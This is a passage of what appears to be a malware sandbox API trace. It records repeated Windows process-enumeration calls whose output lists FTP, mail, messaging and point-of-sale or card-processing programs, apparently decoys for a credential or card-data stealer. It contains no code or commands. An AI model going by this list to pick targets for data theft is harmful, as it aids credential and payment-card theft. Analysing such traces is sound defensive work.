cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0205.611] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0205.614] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0205.617] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0205.628] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0205.631] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0205.634] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0205.637] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0205.640] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0205.644] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0205.647] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0205.650] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0205.653] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0205.661] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0205.664] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0205.671] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0205.675] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0205.678] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0205.681] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0205.684] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0205.687] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0205.689] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0205.692] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0205.694] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0205.696] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0205.699] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0205.703] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0205.709] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0205.712] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0205.714] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0205.716] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0205.720] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0205.722] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0205.724] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0205.727] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0205.730] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0205.732] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0205.735] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0205.737] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0205.739] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0205.741] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0205.743] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0205.750] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0205.752] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0205.754] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.757] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0205.759] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0205.761] CloseHandle (hObject=0x20f4) returned 1 [0205.761] Sleep (dwMilliseconds=0x64) [0205.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20fc [0205.923] Process32First (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.926] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.965] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.968] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.970] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.973] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.975] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.086] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.088] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.090] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.092] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.095] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.097] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.099] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.101] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.102] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.104] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.107] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.109] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.111] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.113] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0206.115] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.117] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0206.119] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.153] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0206.155] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0206.157] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0206.159] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0206.161] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0206.164] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0206.166] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.167] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.170] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0206.172] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.173] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.175] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.177] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.179] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: 